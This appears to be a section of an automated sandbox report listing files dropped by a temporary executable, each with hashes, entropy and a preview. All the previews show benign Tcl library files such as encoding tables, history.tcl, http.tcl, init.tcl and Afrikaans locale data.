                                                                                                                                                                                                                                                                                                                                Preview:# Encoding file: macRoman, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8.00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC.202000B000A200A300A7202200B600DF00AE00A9212200B400A8226000C600D8.221E00B12264226500A500B522022211220F03C0222B00AA00BA03A900E600F8.00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153.20132014201C201D2018201900F725CA00FF0178204420AC2039203AFB01FB02.202100B7201A201E203000C200CA00C100CB0
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1095
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.342586490827578
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:8tTUmJvRju3ShVbsZiAMiZyb7P4SNMVZSxOZFYRMdj/TAg4JysAWD:8tgmOEVIwAMiw/P3AtYRMFTABEszD
                                                                                                                                                                                                                                                                                                                                MD5:C9AD5E42DA1D2C872223A14CC76F1D2B
                                                                                                                                                                                                                                                                                                                                SHA1:E257BD16EF34FDC29D5B6C985A1B45801937354C
                                                                                                                                                                                                                                                                                                                                SHA-256:71AE80ADFB437B7BC88F3C76FD37074449B3526E7AA5776D2B9FD5A43C066FA8
                                                                                                                                                                                                                                                                                                                                SHA-512:74588523D35A562AD4B1AF2B570596194D8C5018D5B44C8BA2B1F6BAD422D06E90172B0E65BB975663F3A3C246BCF2F598E9778BA86D1C5A51F5C0A38A2670EC
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Encoding file: macRomania, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8.00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC.202000B000A200A300A7202200B600DF00AE00A9212200B400A822600102015E.221E00B12264226500A500B522022211220F03C0222B00AA00BA21260103015F.00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153.20132014201C201D2018201900F725CA00FF0178204400A42039203A01620163.202100B7201A201E203000C200CA00C100C
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1092
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.539905812302991
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:88TUmJvRju3ShVbsZiAMiZyb7P4oJi8XPHmED43U/Tmh:88gmOEVIwAMiw/PNJpP43U0
                                                                                                                                                                                                                                                                                                                                MD5:163729C7C2B1F5A5DE1FB7866C93B102
                                                                                                                                                                                                                                                                                                                                SHA1:633D190B5E281CFC0178F6C11DD721C6A266F643
                                                                                                                                                                                                                                                                                                                                SHA-256:CEAD5EB2B0B44EF4003FBCB2E49CA0503992BA1D6540D11ACBBB84FDBBD6E79A
                                                                                                                                                                                                                                                                                                                                SHA-512:2093E3B59622E61F29276886911FAA50BA3AA9D903CAF8CB778A1D3FDB3D1F7DA43071AFC3672C27BE175E7EEBBC542B655A85533F41EA39F32E80663CAF3B44
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Encoding file: macThai, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.00AB00BB2026F88CF88FF892F895F898F88BF88EF891F894F897201C201DF899.FFFD2022F884F889F885F886F887F888F88AF88DF890F893F89620182019FFFD.00A00E010E020E030E040E050E060E070E080E090E0A0E0B0E0C0E0D0E0E0E0F.0E100E110E120E130E140E150E160E170E180E190E1A0E1B0E1C0E1D0E1E0E1F.0E200E210E220E230E240E250E260E270E280E290E2A0E2B0E2C0E2D0E2E0E2F.0E300E310E320E330E340E350E360E370E380E390E3AFEFF200B201320140E3F.0E400E410E420E430E440E450E460E470E480E
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1095
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.353168947106635
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:8QjTUmJvRju3ShVbsZiAMiZyb7P4SNMVtOZm5YRMdD/g4JysD:88gmOEVIwAMiw/P32YRM9BEsD
                                                                                                                                                                                                                                                                                                                                MD5:F20CBBE1FF9289AC4CBAFA136A9D3FF1
                                                                                                                                                                                                                                                                                                                                SHA1:382E34824AD8B79EF0C98FD516750649FD94B20A
                                                                                                                                                                                                                                                                                                                                SHA-256:F703B7F74CC6F5FAA959F51C757C94623677E27013BCAE23BEFBA01A392646D9
                                                                                                                                                                                                                                                                                                                                SHA-512:23733B711614EA99D954E92C6035DAC1237866107FE11CDD5B0CD2A780F22B9B7B879570DB38C6B9195F54DAD9DFB0D60641AB37DFF3C51CF1A11D1D36471B2D
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Encoding file: macTurkish, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8.00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC.202000B000A200A300A7202200B600DF00AE00A9212200B400A8226000C600D8.221E00B12264226500A500B522022211220F03C0222B00AA00BA03A900E600F8.00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153.20132014201C201D2018201900F725CA00FF0178011E011F01300131015E015F.202100B7201A201E203000C200CA00C100C
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1095
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.3460856516901947
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:8TzTUmJvRju3ShVbsZiAMiZyb7P4GE+SAJlM9aDpiR/Pk956e3cmq:8PgmOEVIwAMiw/Pr5NY3k9nsmq
                                                                                                                                                                                                                                                                                                                                MD5:92716A59D631BA3A352DE0872A5CF351
                                                                                                                                                                                                                                                                                                                                SHA1:A487946CB2EFD75FD748503D75E495720B53E5BC
                                                                                                                                                                                                                                                                                                                                SHA-256:4C94E7FBE183379805056D960AB624D78879E43278262E4D6B98AB78E5FEFEA8
                                                                                                                                                                                                                                                                                                                                SHA-512:863A667B6404ED02FE994089320EB0ECC34DC431D591D661277FB54A2055334DBEBCAAE1CA06FB8D190727EBA23A47B47991323BE35E74C182F83E5DEAA0D83B
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Encoding file: macUkraine, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.0410041104120413041404150416041704180419041A041B041C041D041E041F.0420042104220423042404250426042704280429042A042B042C042D042E042F.202000B0049000A300A7202200B6040600AE00A9212204020452226004030453.221E00B122642265045600B504910408040404540407045704090459040A045A.0458040500AC221A01922248220600AB00BB202600A0040B045B040C045C0455.20132014201C201D2018201900F7201E040E045E040F045F211604010451044F.04300431043204330434043504360437043
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):41862
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.4936148161949747
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:/huW1PJnT9TOZRaQiPCLUKr7KBi9FrOLdtY:/ZPV9KoqTxFGXY
                                                                                                                                                                                                                                                                                                                                MD5:8FBCB1BBC4B59D6854A8FCBF25853E0D
                                                                                                                                                                                                                                                                                                                                SHA1:2D56965B24125D999D1020C7C347B813A972647C
                                                                                                                                                                                                                                                                                                                                SHA-256:7502587D52E7810228F2ECB45AC4319EA0F5C008B7AC91053B920010DC6DDF94
                                                                                                                                                                                                                                                                                                                                SHA-512:128E66F384F9EA8F3E7FBEAD0D3AA1D45570EB3669172269A89AE3B522ED44E4572C6A5C9281B7E219579041D14FF0E76777A36E3902BFA1B58DC3DA729FA075
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Encoding file: shiftjis, multi-byte.M.003F 0 40.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.0080000000000000000000850086008700000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000FF61FF62FF63FF64FF65FF66FF67FF68FF69FF6AFF6BFF6CFF6DFF6EFF6F.FF70FF71FF72FF73FF74FF75FF76FF77FF78FF79FF7AFF7BFF7CFF7DFF7EFF7F.FF80FF81FF82FF83FF84FF85FF86FF87FF88FF89FF8AFF8BFF8CFF8DFF8EFF8F.FF90FF91FF92FF93FF94FF95FF96FF97FF98FF99FF9AFF9BFF9CFF9DFF9EFF9F.0000000000000000000000000000000000000
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1091
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.675943323650254
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:Sd0UmJvRjuLoVoMQVoRmSdsTAsSnP9Us+yw4VivXObCXv:afmOEVoMQVoRmosTHSP9U/ydmXwCXv
                                                                                                                                                                                                                                                                                                                                MD5:1B612907F31C11858983AF8C009976D6
                                                                                                                                                                                                                                                                                                                                SHA1:F0C014B6D67FC0DC1D1BBC5F052F0C8B1C63D8BF
                                                                                                                                                                                                                                                                                                                                SHA-256:73FD2B5E14309D8C036D334F137B9EDF1F7B32DBD45491CF93184818582D0671
                                                                                                                                                                                                                                                                                                                                SHA-512:82D4A8F9C63F50E5D77DAD979D3A59729CD2A504E7159AE3A908B7D66DC02090DABD79B6A6DC7B998C32C383F804AACABC564A5617085E02204ADF0B13B13E5B
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Encoding file: symbol, single-byte.S.003F 1 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002122000023220300250026220D002800292217002B002C2212002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.22450391039203A70394039503A603930397039903D1039A039B039C039D039F.03A0039803A103A303A403A503C203A9039E03A80396005B2234005D22A5005F.F8E503B103B203C703B403B503C603B303B703B903D503BA03BB03BC03BD03BF.03C003B803C103C303C403C503D603C903BE03C803B6007B007C007D223C007F.0080008100820083008400850086008700880089008A008B008C008D008E008F.0090009100920093009400950096009700980099009A009B009C009D009E009F.000003D2203222642044221E0192266326662665266021942190219121922193.00B000B12033226500D7221D2202202200F72260226122482026F8E6F8E721B5.21352111211C21182297229522052229222A2283228722842282228622082209.2220220700AE00A92122220F221A22C500AC2227222821D421D021D121D221D3.22C42329F8E8F8E9F8EA2211F8EBF8ECF8EDF8E
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1091
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):2.9763240350841884
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:ZlTUmJvRju3ShVbsZiAMiZyb7PNHmED43U/TW5dF:PgmOEVIwAMiw/PJ43UKF
                                                                                                                                                                                                                                                                                                                                MD5:7273E998972C9EFB2CEB2D5CD553DE49
                                                                                                                                                                                                                                                                                                                                SHA1:4AA47E6DF964366FA3C29A0313C0DAE0FA63A78F
                                                                                                                                                                                                                                                                                                                                SHA-256:330517F72738834ECBF4B6FA579F725B4B33AD9F4669975E727B40DF185751FF
                                                                                                                                                                                                                                                                                                                                SHA-512:56BF15C123083D3F04FE0C506EE8ECE4C08C17754F0CAAD3566F1469728CFD2F0A487023DCB26432240EB09F064944D3EF08175979F5D1D2BF734E7C7C609055
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Encoding file: tis-620, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E0000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.00000E010E020E030E040E050E060E070E080E090E0A0E0B0E0C0E0D0E0E0E0F.0E100E110E120E130E140E150E160E170E180E190E1A0E1B0E1C0E1D0E1E0E1F.0E200E210E220E230E240E250E260E270E280E290E2A0E2B0E2C0E2D0E2E0E2F.0E300E310E320E330E340E350E360E370E380E390E3A00000000000000000E3F.0E400E410E420E430E440E450E460E470E480E
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7900
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.806010360595623
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:DXzSaH9ox7j4LaQMpsyGb0XEACrHpff6Jy8qNy6QRIt5QYTLa3QAQYplavQqQIL0:DpH9m7DPnQdg+Q
                                                                                                                                                                                                                                                                                                                                MD5:E8FD468CCD2EE620544FE204BDE2A59D
                                                                                                                                                                                                                                                                                                                                SHA1:2E26B7977D900EAA7D4908D5113803DF6F34FC59
                                                                                                                                                                                                                                                                                                                                SHA-256:9B6E400EB85440EC64AB66B4AC111546585740C9CA61FD156400D7153CBAD9F4
                                                                                                                                                                                                                                                                                                                                SHA-512:13A40A4BDE32F163CB789C69BD260ABF41C6771E7AC50FB122C727B9F39BE5D73E4D8BAE040DDDD94C5F2B901AB7C32D9C6BB62310121CA8DB4ADE25CB9AA4B0
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# history.tcl --.#.# Implementation of the history command..#.# Copyright (c) 1997 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution of.# this file, and for a DISCLAIMER OF ALL WARRANTIES..#...# The tcl::history array holds the history list and some additional.# bookkeeping variables..#.# nextid.the index used for the next history list item..# keep..the max size of the history list.# oldest.the index of the oldest item in the history...namespace eval ::tcl {. variable history. if {![info exists history]} {..array set history {.. nextid.0.. keep.20.. oldest.-20..}. }.. namespace ensemble create -command ::tcl::history -map {..add.::tcl::HistAdd..change.::tcl::HistChange..clear.::tcl::HistClear..event.::tcl::HistEvent..info.::tcl::HistInfo..keep.::tcl::HistKeep..nextid.::tcl::HistNextID..redo.::tcl::HistRedo. }.}...# history --.#.#.This is the main history command. See the man page for its interface..#.This does s
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):9689
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.754346192989986
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:kQkH8VqqNg5PPx7GRpoMJesrCL2coOG0vARQVSDR6VrKj7vWQYQN81QvLbDdv:pVqeglpu6toO3ACUnvv
                                                                                                                                                                                                                                                                                                                                MD5:1DA12C32E7E4C040BD9AB2BCBAC5445B
                                                                                                                                                                                                                                                                                                                                SHA1:8E8659BEF065AF9430509BBDD5FB4CFE0EF14153
                                                                                                                                                                                                                                                                                                                                SHA-256:ACBFF9B5EF75790920B95023156FAD80B18AFF8CAFC4A6DC03893F9388E053A2
                                                                                                                                                                                                                                                                                                                                SHA-512:A269C76C1684EC1A2E2AA611ABB459AA3BE2973FD456737BC8C8D2E5C8BC53A26BBC1488062281CA87E38D548281166C4D775C50C695AEC9741FE911BB431EAD
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# http.tcl.# Client-side HTTP for GET, POST, and HEAD commands..# These routines can be used in untrusted code that uses the Safesock.# security policy..# These procedures use a callback interface to avoid using vwait,.# which is not defined in the safe base..#.# See the http.n man page for documentation..package provide http 1.0..array set http {. -accept */*. -proxyhost {}. -proxyport {}. -useragent {Tcl http client package 1.0}. -proxyfilter httpProxyRequired.}.proc http_config {args} {. global http. set options [lsort [array names http -*]]. set usage [join $options ", "]. if {[llength $args] == 0} {..set result {}..foreach name $options {.. lappend result $name $http($name)..}..return $result. }. regsub -all -- - $options {} options. set pat ^-([join $options |])$. if {[llength $args] == 1} {..set flag [lindex $args 0]..if {[regexp -- $pat $flag]} {.. return $http($flag)..} else {.. return -code error "Unknown option $flag, must be:
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):735
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.669068874824871
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:jHxxYRs+opS42wyGlTajUA43KXks4L57+HkuRz20JSv6C3l5kl:bbYRshS42wyGlTah9XkbL5i1z2jxXkl
                                                                                                                                                                                                                                                                                                                                MD5:10EC7CD64CA949099C818646B6FAE31C
                                                                                                                                                                                                                                                                                                                                SHA1:6001A58A0701DFF225E2510A4AAEE6489A537657
                                                                                                                                                                                                                                                                                                                                SHA-256:420C4B3088C9DACD21BC348011CAC61D7CB283B9BEE78AE72EED764AB094651C
                                                                                                                                                                                                                                                                                                                                SHA-512:34A0ACB689E430ED2903D8A903D531A3D734CB37733EF13C5D243CB9F59C020A3856AAD98726E10AD7F4D67619A3AF1018F6C3E53A6E073E39BD31D088EFD4AF
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Tcl package index file, version 1.0.# This file is generated by the "pkg_mkIndex" command.# and sourced either when an application starts up or.# by a "package unknown" script. It invokes the.# "package ifneeded" command to set up package-related.# information so that packages will be loaded automatically.# in response to "package require" commands. When this.# script is sourced, the variable $dir must contain the.# full path name of this file's directory...package ifneeded http 1.0 [list tclPkgSetup $dir http 1.0 {{http.tcl source {httpCopyDone httpCopyStart httpEof httpEvent httpFinish httpMapReply httpProxyRequired http_code http_config http_data http_formatQuery http_get http_reset http_size http_status http_wait}}}].
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:Tcl script, ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):24432
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.824619671192163
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:384:U8Oh2gWD8Ud4zaJqacMQsRNLKx32LgWMOFaBBf6/9IrO1zWq8oXbjdEfdQxAp12Q:2OD8Ud4WJqJfcMOFt/9IrOBWq8oXwQxM
                                                                                                                                                                                                                                                                                                                                MD5:B900811A252BE90C693E5E7AE365869D
                                                                                                                                                                                                                                                                                                                                SHA1:345752C46F7E8E67DADEF7F6FD514BED4B708FC5
                                                                                                                                                                                                                                                                                                                                SHA-256:BC492B19308BC011CFCD321F1E6E65E6239D4EEB620CC02F7E9BF89002511D4A
                                                                                                                                                                                                                                                                                                                                SHA-512:36B8CDBA61B9222F65B055C0C513801F3278A3851912215658BCF0CE10F80197C1F12A5CA3054D8604DA005CE08DA8DCD303B8544706B642140A49C4377DD6CE
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# init.tcl --.#.# Default system startup file for Tcl-based applications. Defines.# "unknown" procedure and auto-load facilities..#.# Copyright (c) 1991-1993 The Regents of the University of California..# Copyright (c) 1994-1996 Sun Microsystems, Inc..# Copyright (c) 1998-1999 Scriptics Corporation..# Copyright (c) 2004 by Kevin B. Kenny. All rights reserved..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# This test intentionally written in pre-7.5 Tcl.if {[info commands package] == ""} {. error "version mismatch: library\nscripts expect Tcl version 7.5b1 or later but the loaded version is\nonly [info patchlevel]".}.package require -exact Tcl 8.6.9..# Compute the auto path to use in this interpreter..# The values on the path come from several locations:.#.# The environment variable TCLLIBPATH.#.# tcl_library, which is the directory containing this init.tcl script..# [tclInit] (Tcl_Init()) sea
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):989
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.015702624322247
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:4EnLzu8wcm2NkKcmtH3WhvdfjESBToOqepFHvFgdF69dixmem1OMVjeza6O6c:4azu8DtkN3bbJ75pF9gG3U2e+gc
                                                                                                                                                                                                                                                                                                                                MD5:3A3B4D3B137E7270105DC7B359A2E5C2
                                                                                                                                                                                                                                                                                                                                SHA1:2089B3948F11EF8CE4BD3D57167715ADE65875E9
                                                                                                                                                                                                                                                                                                                                SHA-256:2981965BD23A93A09EB5B4A334ACB15D00645D645C596A5ECADB88BFA0B6A908
                                                                                                                                                                                                                                                                                                                                SHA-512:044602E7228D2CB3D0A260ADFD0D3A1F7CAB7EFE5DD00C7519EAF00A395A48A46EEFDB3DE81902D420D009B137030BC98FF32AD97E9C3713F0990FE6C09887A2
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset af DAYS_OF_WEEK_ABBREV [list \. "So"\. "Ma"\. "Di"\. "Wo"\. "Do"\. "Vr"\. "Sa"]. ::msgcat::mcset af DAYS_OF_WEEK_FULL [list \. "Sondag"\. "Maandag"\. "Dinsdag"\. "Woensdag"\. "Donderdag"\. "Vrydag"\. "Saterdag"]. ::msgcat::mcset af MONTHS_ABBREV [list \. "Jan"\. "Feb"\. "Mar"\. "Apr"\. "Mei"\. "Jun"\. "Jul"\. "Aug"\. "Sep"\. "Okt"\. "Nov"\. "Des"\. ""]. ::msgcat::mcset af MONTHS_FULL [list \. "Januarie"\. "Februarie"\. "Maart"\. "April"\. "Mei"\. "Junie"\. "Julie"\. "Augustus"\. "September"\. "Oktober"\. "November"\. "Desember"\. ""]. ::msgcat::mcset af AM "VM". ::msgcat::mcset af PM "NM".}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):251
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.879621059534584
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSyEtJLlpuoo6dmouFygvNLouFqF3v6aZouFy9+3vR6HK:4EnLzu8YAgvNTYF3v6axAI3voq
                                                                                                                                                                                                                                                                                                                                MD5:27C356DF1BED4B22DFA55835115BE082
                                                                                                                                                                                                                                                                                                                                SHA1:677394DF81CDBAF3D3E735F4977153BB5C81B1A6
                                                                                                                                                                                                                                                                                                                                SHA-256:3C2F5F631ED3603EF0D5BCB31C51B2353C5C27839C806A036F3B7007AF7F3DE8
                                                                                                                                                                                                                                                                                                                                SHA-512:EE88348C103382F91F684A09F594177119960F87E58C5E4FC718C698AD436E332B74B8ED18DF8563F736515A3A6442C608EBCBE6D1BD13B3E3664E1AA3851076
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset af_ZA DATE_FORMAT "%d %B %Y". ::msgcat::mcset af_ZA TIME_FORMAT_12 "%l:%M:%S %P". ::msgcat::mcset af_ZA DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z".}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1964
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.417722751563065
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu8fnkFewadQxvbkMPm/FiUoAwonC9UFsvSnvMq:46dw/L+C9cKSvF
                                                                                                                                                                                                                                                                                                                                MD5:0A88A6BFF15A6DABAAE48A78D01CFAF1
                                                                                                                                                                                                                                                                                                                                SHA1:90834BCBDA9B9317B92786EC89E20DCF1F2DBD22
                                                                                                                                                                                                                                                                                                                                SHA-256:BF984EC7CF619E700FE7E00381FF58ABE9BD2F4B3DD622EB2EDACCC5E6681050
                                                                                                                                                                                                                                                                                                                                SHA-512:85CB96321BB6FB3119D69540B9E76916F0C5F534BA01382E73F8F9A0EE67A7F1BFC39947335688F2C8F3DB9B51D969D8EA7C7104A035C0E949E8E009D4656288
                                                                                                                                                                                                                                                                                                                                Malicious:false
